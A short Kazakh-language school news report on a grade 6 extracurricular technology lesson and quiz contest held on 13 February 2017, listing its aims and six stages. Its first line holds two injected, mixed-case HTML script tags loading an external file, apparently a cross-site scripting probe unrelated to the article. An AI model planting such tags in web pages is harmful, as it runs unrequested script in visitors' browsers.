<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
Ғ. Әбдірахманұлы атындағы Қима орта мектебінде дене тәрбиесі және эстетикалық пәндер әдістемелік бірлестігінің аясында технология пәнінен 6 сыныпта сыныптан тыс ашық сабақ өткізілді.
2017 жылы ақпан 13-і «Кім жылдам және кім шебер» атты технологиядан 6 сыныпта сыныптан тыс ашық сабақ болып өтті.
Мақсаты: Оқушыларға қазақтың мақал - мәтелдерін, салт дәстүрін, оқушылардың технология пәнінен алған білімдерін іс - тәжірибемен ұштастыра және толық мағлұмат бере отырып, шығармашылық қабілетін ояту.
Сайыс сабақ алты кезеңнен тұрді.
1 кезең. Зымыран сұрақтары (әр сұрақ 2 ұпаймен бағаланады)
2 кезең. Ойлан тап (берілген суреттерден мақал құрау-5 ұпай)
3 кезең. Көнерген сөздің мағынасын табу (әр тапсырма 5 ұпай)
4 кезең . Күшіңе сенбе, ісіңе сен (дайын ДВП бетіне ою-өрнек салады 5 ұпай)
V кезең. Құрастырма сурет(суреттің бір бөлігі көрсетілген, суретте жасырылған затты тап)
VI кезең. Өнерлі бала өрге жүзер (Үй тапсырмасы)
Екі топ оқушылары барлық кезеңдерге белсене қатысып, білімдерін шыңдай түсті. Сабақ қызықты, тартысты өтті.